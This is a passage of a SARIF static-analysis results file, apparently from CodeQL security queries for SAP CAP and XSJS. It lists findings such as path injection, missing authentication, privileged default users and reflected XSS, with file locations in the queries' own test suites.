operations."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":41,"startColumn":26,"endColumn":35}}}],"partialFingerprints":{"primaryLocationLineHash":"66f493d838c437b1:1","primaryLocationStartColumnFingerprint":"13"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":19,"endColumn":28}},"message":{"text":"userinput"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":41,"startColumn":26,"endColumn":35}},"message":{"text":"userinput"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file operations."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":43,"startColumn":25,"endColumn":34}}}],"partialFingerprints":{"primaryLocationLineHash":"8f73a0930e234a4e:1","primaryLocationStartColumnFingerprint":"12"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":19,"endColumn":28}},"message":{"text":"userinput"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":43,"startColumn":25,"endColumn":34}},"message":{"text":"userinput"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file operations."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":44,"startColumn":25,"endColumn":34}}}],"partialFingerprints":{"primaryLocationLineHash":"d6c22993642b7f91:1","primaryLocationStartColumnFingerprint":"12"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":19,"endColumn":28}},"message":{"text":"userinput"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":44,"startColumn":25,"endColumn":34}},"message":{"text":"userinput"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file operations."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":46,"startColumn":26,"endColumn":35}}}],"partialFingerprints":{"primaryLocationLineHash":"a8a6e2d6350921ee:1","primaryLocationStartColumnFingerprint":"13"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":19,"endColumn":28}},"message":{"text":"userinput"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":46,"startColumn":26,"endColumn":35}},"message":{"text":"userinput"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file operations."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":47,"startColumn":26,"endColumn":35}}}],"partialFingerprints":{"primaryLocationLineHash":"434bdd8f18e7c7d:1","primaryLocationStartColumnFingerprint":"13"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":19,"endColumn":28}},"message":{"text":"userinput"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":47,"startColumn":26,"endColumn":35}},"message":{"text":"userinput"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file operations."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":49,"startColumn":22,"endColumn":31}}}],"partialFingerprints":{"primaryLocationLineHash":"8ecbfdc82d65a76d:1","primaryLocationStartColumnFingerprint":"9"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":19,"endColumn":28}},"message":{"text":"userinput"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":49,"startColumn":22,"endColumn":31}},"message":{"text":"userinput"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file operations."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":50,"startColumn":22,"endColumn":31}}}],"partialFingerprints":{"primaryLocationLineHash":"62c405a97e577740:1","primaryLocationStartColumnFingerprint":"9"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":19,"endColumn":28}},"message":{"text":"userinput"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":50,"startColumn":22,"endColumn":31}},"message":{"text":"userinput"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}}}]},{"ruleId":"js/cap-non-prod-auth-strategy","rule":{"id":"js/cap-non-prod-auth-strategy","index":3,"toolComponent":{"index":8}},"message":{"text":"Current authentication strategy contains [credentials of mocked users](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json","uriBaseId":"%SRCROOT%","index":159},"region":{"startLine":17,"startColumn":18,"endLine":32,"endColumn":10}}}],"partialFingerprints":{"primaryLocationLineHash":"189356aa691178ee:1","primaryLocationStartColumnFingerprint":"9"},"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json","uriBaseId":"%SRCROOT%","index":159},"region":{"startLine":17,"startColumn":18,"endLine":32,"endColumn":10}},"message":{"text":"credentials of mocked users"}}]},{"ruleId":"js/cap-non-prod-auth-strategy","rule":{"id":"js/cap-non-prod-auth-strategy","index":3,"toolComponent":{"index":8}},"message":{"text":"Non-production authentication strategy [basic](1) is used."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json","uriBaseId":"%SRCROOT%","index":159},"region":{"startLine":16,"startColumn":17,"endColumn":24}}}],"partialFingerprints":{"primaryLocationLineHash":"8ec70b5c261c793b:1","primaryLocationStartColumnFingerprint":"8"},"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json","uriBaseId":"%SRCROOT%","index":159},"region":{"startLine":16,"startColumn":17,"endColumn":24}},"message":{"text":"basic"}}]},{"ruleId":"js/cap-non-prod-auth-strategy","rule":{"id":"js/cap-non-prod-auth-strategy","index":3,"toolComponent":{"index":8}},"message":{"text":"Non-production authentication strategy [dummy](1) is used."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/package.json","uriBaseId":"%SRCROOT%","index":167},"region":{"startLine":15,"startColumn":15,"endColumn":22}}}],"partialFingerprints":{"primaryLocationLineHash":"2a27bf058be4572:1","primaryLocationStartColumnFingerprint":"8"},"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/package.json","uriBaseId":"%SRCROOT%","index":167},"region":{"startLine":15,"startColumn":15,"endColumn":22}},"message":{"text":"dummy"}}]},{"ruleId":"js/cap-non-prod-auth-strategy","rule":{"id":"js/cap-non-prod-auth-strategy","index":3,"toolComponent":{"index":8}},"message":{"text":"Non-production authentication strategy [mocked](1) is used."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json","uriBaseId":"%SRCROOT%","index":175},"region":{"startLine":21,"startColumn":15,"endColumn":23}}}],"partialFingerprints":{"primaryLocationLineHash":"2af5230c91e6a4cd:1","primaryLocationStartColumnFingerprint":"8"},"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json","uriBaseId":"%SRCROOT%","index":175},"region":{"startLine":21,"startColumn":15,"endColumn":23}},"message":{"text":"mocked"}}]},{"ruleId":"js/cap-default-user-is-privileged","rule":{"id":"js/cap-default-user-is-privileged","index":4,"toolComponent":{"index":8}},"message":{"text":"The default user is being overridden to a privileged user."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.js","uriBaseId":"%SRCROOT%","index":144},"region":{"startLine":14,"startColumn":7,"endColumn":43}}}],"partialFingerprints":{"primaryLocationLineHash":"2c0c554bf5b5f7d:1","primaryLocationStartColumnFingerprint":"0"}},{"ruleId":"js/cap-default-user-is-privileged","rule":{"id":"js/cap-default-user-is-privileged","index":4,"toolComponent":{"index":8}},"message":{"text":"The default user is being overridden to a privileged user."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/server.js","uriBaseId":"%SRCROOT%","index":142},"region":{"startLine":8,"endColumn":37}}}],"partialFingerprints":{"primaryLocationLineHash":"b6ec748aef5ccec4:1","primaryLocationStartColumnFingerprint":"0"}},{"ruleId":"js/cap-default-user-is-privileged","rule":{"id":"js/cap-default-user-is-privileged","index":4,"toolComponent":{"index":8}},"message":{"text":"The default user is being overridden to a privileged user."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.js","uriBaseId":"%SRCROOT%","index":146},"region":{"startLine":12,"startColumn":5,"endColumn":41}}}],"partialFingerprints":{"primaryLocationLineHash":"ee143e9aad9c9a16:1","primaryLocationStartColumnFingerprint":"0"}},{"ruleId":"js/cap-unnecessarily-granted-privileged-access-rights","rule":{"id":"js/cap-unnecessarily-granted-privileged-access-rights","index":5,"toolComponent":{"index":8}},"message":{"text":"This entity is accessed with unnecessarily privileged rights that requires authorization."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service2.js","uriBaseId":"%SRCROOT%","index":156},"region":{"startLine":18,"startColumn":21,"endColumn":38}}}],"partialFingerprints":{"primaryLocationLineHash":"383e73b4014710f9:1","primaryLocationStartColumnFingerprint":"12"}},{"ruleId":"js/cap-unnecessarily-granted-privileged-access-rights","rule":{"id":"js/cap-unnecessarily-granted-privileged-access-rights","index":5,"toolComponent":{"index":8}},"message":{"text":"This entity is accessed with unnecessarily privileged rights that requires authorization."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.js","uriBaseId":"%SRCROOT%","index":153},"region":{"startLine":18,"startColumn":24,"endColumn":50}}}],"partialFingerprints":{"primaryLocationLineHash":"62915c8622048073:1","primaryLocationStartColumnFingerprint":"11"}},{"ruleId":"js/cap-unnecessarily-granted-privileged-access-rights","rule":{"id":"js/cap-unnecessarily-granted-privileged-access-rights","index":5,"toolComponent":{"index":8}},"message":{"text":"This entity is accessed with unnecessarily privileged rights that requires authorization."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service2.js","uriBaseId":"%SRCROOT%","index":156},"region":{"startLine":35,"startColumn":21,"endColumn":38}}}],"partialFingerprints":{"primaryLocationLineHash":"383e73b4014710f9:2","primaryLocationStartColumnFingerprint":"12"}},{"ruleId":"js/cap-unnecessarily-granted-privileged-access-rights","rule":{"id":"js/cap-unnecessarily-granted-privileged-access-rights","index":5,"toolComponent":{"index":8}},"message":{"text":"This entity is accessed with unnecessarily privileged rights that requires authorization."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.js","uriBaseId":"%SRCROOT%","index":153},"region":{"startLine":33,"startColumn":24,"endColumn":50}}}],"partialFingerprints":{"primaryLocationLineHash":"8c5c989d244a1f09:1","primaryLocationStartColumnFingerprint":"11"}},{"ruleId":"js/cap-unnecessarily-granted-privileged-access-rights","rule":{"id":"js/cap-unnecessarily-granted-privileged-access-rights","index":5,"toolComponent":{"index":8}},"message":{"text":"This entity is accessed with unnecessarily privileged rights that requires authorization."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.js","uriBaseId":"%SRCROOT%","index":153},"region":{"startLine":50,"startColumn":25,"endColumn":40}}}],"partialFingerprints":{"primaryLocationLineHash":"faab9436420ec8fd:1","primaryLocationStartColumnFingerprint":"12"}},{"ruleId":"js/cap-unnecessarily-granted-privileged-access-rights","rule":{"id":"js/cap-unnecessarily-granted-privileged-access-rights","index":5,"toolComponent":{"index":8}},"message":{"text":"This entity is accessed with unnecessarily privileged rights that requires authorization."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.js","uriBaseId":"%SRCROOT%","index":153},"region":{"startLine":67,"startColumn":25,"endColumn":40}}}],"partialFingerprints":{"primaryLocationLineHash":"8eb12b95cf4128eb:1","primaryLocationStartColumnFingerprint":"12"}},{"ruleId":"js/cap-unnecessarily-granted-privileged-access-rights","rule":{"id":"js/cap-unnecessarily-granted-privileged-access-rights","index":5,"toolComponent":{"index":8}},"message":{"text":"This entity is accessed with unnecessarily privileged rights that may require authorization."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.js","uriBaseId":"%SRCROOT%","index":153},"region":{"startLine":83,"startColumn":24,"endColumn":38}}}],"partialFingerprints":{"primaryLocationLineHash":"9343d25bdd5ba748:1","primaryLocationStartColumnFingerprint":"11"}},{"ruleId":"js/cap-entity-exposed-without-authentication","rule":{"id":"js/cap-entity-exposed-without-authentication","index":6,"toolComponent":{"index":8}},"message":{"text":"The CDS entity `Service1.Service1Entity1` is exposed without any authentication."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.cds","uriBaseId":"%SRCROOT%","index":154},"region":{"startLine":6,"startColumn":10,"endColumn":25}}}],"partialFingerprints":{"primaryLocationLineHash":"3984db8d11cdcda4:1","primaryLocationStartColumnFingerprint":"7"}},{"ruleId":"js/cap-entity-exposed-without-authentication","rule":{"id":"js/cap-entity-exposed-without-authentication","index":6,"toolComponent":{"index":8}},"message":{"text":"The CDS action `Service1.send2` is exposed without any authentication."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.cds","uriBaseId":"%SRCROOT%","index":154},"region":{"startLine":18,"startColumn":10,"endColumn":15}}}],"partialFingerprints":{"primaryLocationLineHash":"28b66b32406f07ba:1","primaryLocationStartColumnFingerprint":"7"}},{"ruleId":"js/cap-entity-exposed-without-authentication","rule":{"id":"js/cap-entity-exposed-without-authentication","index":6,"toolComponent":{"index":8}},"message":{"text":"The CDS action `Service1.send3` is exposed without any authentication."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.cds","uriBaseId":"%SRCROOT%","index":154},"region":{"startLine":23,"startColumn":10,"endColumn":15}}}],"partialFingerprints":{"primaryLocationLineHash":"a5382f0f9fda534:1","primaryLocationStartColumnFingerprint":"7"}},{"ruleId":"js/cap-entity-exposed-without-authentication","rule":{"id":"js/cap-entity-exposed-without-authentication","index":6,"toolComponent":{"index":8}},"message":{"text":"The CDS action `Service1.send4` is exposed without any authentication."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.cds","uriBaseId":"%SRCROOT%","index":154},"region":{"startLine":28,"startColumn":10,"endColumn":15}}}],"partialFingerprints":{"primaryLocationLineHash":"ebf09aafb38c42ae:1","primaryLocationStartColumnFingerprint":"7"}},{"ruleId":"js/cap-entity-exposed-without-authentication","rule":{"id":"js/cap-entity-exposed-without-authentication","index":6,"toolComponent":{"index":8}},"message":{"text":"The CDS action `Service1.send5` is exposed without any authentication."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.cds","uriBaseId":"%SRCROOT%","index":154},"region":{"startLine":33,"startColumn":10,"endColumn":15}}}],"partialFingerprints":{"primaryLocationLineHash":"65cd9b8a9955401b:1","primaryLocationStartColumnFingerprint":"7"}},{"ruleId":"js/cap-entity-exposed-without-authentication","rule":{"id":"js/cap-entity-exposed-without-authentication","index":6,"toolComponent":{"index":8}},"message":{"text":"The CDS entity `Service2.Service2Entity1` is exposed without any authentication."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service2.cds","uriBaseId":"%SRCROOT%","index":155},"region":{"startLine":6,"startColumn":10,"endColumn":25}}}],"partialFingerprints":{"primaryLocationLineHash":"b02237ac8be3c990:1","primaryLocationStartColumnFingerprint":"7"}},{"ruleId":"js/cap-entity-exposed-without-authentication","rule":{"id":"js/cap-entity-exposed-without-authentication","index":6,"toolComponent":{"index":8}},"message":{"text":"The CDS action `Service2.send1` is exposed without any authentication."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service2.cds","uriBaseId":"%SRCROOT%","index":155},"region":{"startLine":13,"startColumn":10,"endColumn":15}}}],"partialFingerprints":{"primaryLocationLineHash":"d2bdf8ef231dddd1:1","primaryLocationStartColumnFingerprint":"7"}},{"ruleId":"js/cap-entity-exposed-without-authentication","rule":{"id":"js/cap-entity-exposed-without-authentication","index":6,"toolComponent":{"index":8}},"message":{"text":"The CDS service `Service` is exposed without any authentication."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/srv/service.cds","uriBaseId":"%SRCROOT%","index":199},"region":{"startLine":3,"startColumn":9,"endColumn":16}}}],"partialFingerprints":{"primaryLocationLineHash":"a2294454385cb916:1","primaryLocationStartColumnFingerprint":"8"}},{"ruleId":"js/cap-entity-exposed-without-authentication","rule":{"id":"js/cap-entity-exposed-without-authentication","index":6,"toolComponent":{"index":8}},"message":{"text":"The CDS entity `Service.ServiceEntity` is exposed without any authentication."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/srv/service.cds","uriBaseId":"%SRCROOT%","index":199},"region":{"startLine":5,"startColumn":10,"endColumn":23}}}],"partialFingerprints":{"primaryLocationLineHash":"d5a18811944e0c6:1","primaryLocationStartColumnFingerprint":"7"}},{"ruleId":"js/cap-entity-exposed-without-authentication","rule":{"id":"js/cap-entity-exposed-without-authentication","index":6,"toolComponent":{"index":8}},"message":{"text":"The CDS action `Service.send` is exposed without any authentication."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/srv/service.cds","uriBaseId":"%SRCROOT%","index":199},"region":{"startLine":8,"startColumn":10,"endColumn":14}}}],"partialFingerprints":{"primaryLocationLineHash":"e6b459744cc3d70d:1","primaryLocationStartColumnFingerprint":"7"}},{"ruleId":"js/cap-sensitive-log","rule":{"id":"js/cap-sensitive-log","index":7,"toolComponent":{"index":8}},"message":{"text":"Log entry depends on the [name](1) field which is annotated as potentially sensitive."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/sensitive-exposure/sensitive-exposure.js","uriBaseId":"%SRCROOT%","index":238},"region":{"startLine":9,"startColumn":32,"endColumn":43}}}],"partialFingerprints":{"primaryLocationLineHash":"c2d27f652a20308e:1","primaryLocationStartColumnFingerprint":"23"},"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/sensitive-exposure/sensitive-exposure.cds","uriBaseId":"%SRCROOT%","index":237},"region":{"startLine":4,"startColumn":5,"endColumn":9}},"message":{"text":"name"}}]},{"ruleId":"js/xsjs-broken-authentication","rule":{"id":"js/xsjs-broken-authentication","index":0,"toolComponent":{"index":9}},"message":{"text":"Authentication should not be disabled."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSAccess/service/exposed/.xsaccess","uriBaseId":"%SRCROOT%","index":603},"region":{"startLine":3,"startColumn":23,"endColumn":27}}}],"partialFingerprints":{"primaryLocationLineHash":"a900cae7399fb257:1","primaryLocationStartColumnFingerprint":"18"}},{"ruleId":"js/xsjs-broken-authentication","rule":{"id":"js/xsjs-broken-authentication","index":0,"toolComponent":{"index":9}},"message":{"text":"Authentication is missing from the configuration."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSAccess/service/missing_auth/.xsaccess","uriBaseId":"%SRCROOT%","index":604},"region":{"startLine":1,"endLine":4,"endColumn":2}}}],"partialFingerprints":{"primaryLocationLineHash":"b57c6bae252883be:1","primaryLocationStartColumnFingerprint":"0"}},{"ruleId":"js/xsjs-broken-authentication","rule":{"id":"js/xsjs-broken-authentication","index":0,"toolComponent":{"index":9}},"message":{"text":"Authentication should not be disabled."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSAccess/service/xs-app.json","uriBaseId":"%SRCROOT%","index":606},"region":{"startLine":3,"startColumn":29,"endColumn":35}}}],"partialFingerprints":{"primaryLocationLineHash":"7c987b52e21935f7:1","primaryLocationStartColumnFingerprint":"24"}},{"ruleId":"js/xsjs-broken-authentication","rule":{"id":"js/xsjs-broken-authentication","index":0,"toolComponent":{"index":9}},"message":{"text":"Authentication should not be disabled."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSAccess/service/xs-app.json","uriBaseId":"%SRCROOT%","index":606},"region":{"startLine":15,"startColumn":35,"endColumn":41}}}],"partialFingerprints":{"primaryLocationLineHash":"f2aa90ab66c52c3c:1","primaryLocationStartColumnFingerprint":"22"}},{"ruleId":"js/xsjs-reflected-xss","rule":{"id":"js/xsjs-reflected-xss","index":1,"toolComponent":{"index":9}},"message":{"text":"Reflected XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":607},"region":{"startLine":13,"startColumn":22,"endColumn":66}}}],"partialFingerprints":{"primaryLocationLineHash":"a31830db0e0a3d3c:1","primaryLocationStartColumnFingerprint":"19"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":607},"region":{"startLine":11,"startColumn":29,"endColumn":68}},"message":{"text":"request 